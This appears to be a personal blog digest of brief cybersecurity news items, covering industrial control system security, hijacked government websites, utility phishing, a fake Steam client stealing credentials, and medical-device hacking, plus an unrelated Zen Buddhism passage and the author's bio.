DHS Questions Security of ISC

off switchOperators of America’s power, water, and manufacturing facilities use industrial control systems (ICS) to manage them. However, the security of these systems, increasingly linked with Microsoft Windows and the Internet, is now under intense scrutiny because of growing awareness that they could be attacked and cause massive disruptions.

Industrial facility operators are making efforts to follow security procedures, such as using vulnerability-assessment scanning tools to check for needed patches in Windows. That said, ICS environments present special problems, said managers who spoke on the topic at a conference organized by the DHS.

Chief Legal Officers and CIOs Must Work Together

in secureIn a survey by Gartner and ALM, Chief legal officers (CLOs) need to engage enterprise CIOs more.  Further, while CLOs voice consideration for CIOs as contributors to corporate strategy, they continue to lack fundimental understanding of how to use technology in the enterprise or how to interact with their IT departments.

"The survey results showed that communication is the key variable in the success or lack of success of the CLO/IT relationship," said French Caldwell, vice president and Gartner fellow. "When CLOs have substantive conversations with CIOs more than once a month, CLO satisfaction with IT is higher."

Rinzai Zen - Fujaku, Fugu

fujaku fugu

Samsara is the same as nirvana, defilement the same as purity, and delusion the same as enlightenment.  The challenge to understanding is due to one's ignorance -- the ignorance in mistaking phenomena for ultimate reality. Great is Mind. Heaven's height is immeasurable, but Mind goes beyond heaven; the earth's depth is also unfathomable, but Mind reaches below the earth.

Study Zen -- one discovers the key to all forms of Buddhism.
Practice Zen -- one's life is brought to fulfillment in the attainment of enlightenment.

"Where should your mind be kept?  If your mind is not fixed anywhere it will pervade throughout the body... If your mind is fixed on a certain spot, it will be seized by that spot, and no activities can be performed efficiently. Not to fix your mind anywhere is essential. Not fixed anywhere, the mind is everywhere." 

Hacking Governments With Hijacked Sites

hackerMalicious code planted within compromised Wed pages has become the latest method for attackers targeting government organizations, according to research from security firm Zscaler, V3.co.uk reported April 21. The firm discovered many government-affiliated Web sites with code that directs users to attack servers.

The most recent site to become infected was that of the French budget minister. It was found to contain obfuscated Javascript code that sends the user to a third party site and then attempts to exploit vulnerabilities and install malware on the targeted system. The attack is the latest in what Zscaler sees as a string of site hijackings aimed at government-controlled domains.

Social Engineers Target Utilities

uscert2The U.S. Cyber Emergency Response Team (US-CERT) recently warned that cyber criminals are attempting highly targeted social engineering attacks on operators of Industrial Control Systems (ICS).  ICS are very present in Utility firms. The attacks are in the form of phishing phone calls allegedly coming from "Microsoft Server Department" and warning of infected PCs. The attacker attempts to have the utilities turn on services which would allow unauthorized remote access

HINT: Microsoft is not going to call you unless you specifically requested to be called. (see also US Utilities Under Daily Cyber-attack)

Steam Cracker Steals User Credentials

keyloggerUsers of Valve’s Steam game sales and distribution platform are being targeted by malware peddlers; the lure is a "Steam Cracker." It is being offered on YouTube and on many gamer forums, and it supposedly gives the users access to all games for free.

The scammers offer simple instructions for installing the software: disable antivirus software and firewall, then replace the original steam.exe file with the downloaded, cracked one. "The file in question is a fake Steam client, which uses aspects of the real thing but just falls short of being 100 percent convincing (file size, file, and of course the fact that this file isn’t digitally signed unlike the real Steam executable)," a GFI researcher said.

If the user runs Windows Vista or later versions of the platform, the file runs and shows the fake client that looks legitimate.

Wearable Firewall Stops Pacemaker Hacking

borg queenResearchers from Purdue and Princeton universities have developed a solution to what could be catastrophic problem for millions of people who use insulin pumps, pacemakers, and other personal medical devices that rely on wireless communication to function: MedMon — a signal-jamming personal firewall for medical devices that detects potentially malicious communications going into, or coming from, a wearable or implanted device.

After identifying malicious signals, MedMon employs electronic jamming, similar to technology used in military systems, to prevent any potentially harmful wireless commands from getting through to the device and causing it to falter or accept instructions that could cause its wearer harm.

Human Body Vulnerable to Cyberattack

bioengineeringThe next frontier of cybercrime could be the human body, a researcher at the Black Hat Security Conference demonstrated. In his presentation, "Hacking Medical Devices for Fun and Insulin: Breaking the Human SCADA System," Jay Radcliffe showed how a hacker could remotely hack two medical devices used to treat diabetes and trigger them to malfunction — with potentially disastrous results.

"Wireless communication with insulin pumps are not secure, they're not designed to be updated and there's no way of patching them," he told the audience. "It's not like a phone, where you can download a firmware update."

Former Intel Employee Pleads Guilty

corporate espionageA former Intel employee, Biswamohan Pani, pleaded guilty to five counts relating to the illegal download of confidential documents from Intel’s servers. From June 8 through June 11, he downloaded 13 “top secret” Intel design documents from the company’s servers in California, the indictment said.

He copied them from his Intel-issued laptop to an external drive so he could access the documents after he returned the laptop to Intel. He is said to have tried to access the servers again around June 13.

Information

Pragmatic Journey is Richard (rich) Wermske's life of recovery; a spiritual journey inspired by Buddhism, a career in technology and management with linux, digital security, bpm, and paralegal stuff; augmented with gaming, literature, philosophy, art and music; and compassionate kinship with all things living -- especially cats; and people with whom I share no common language.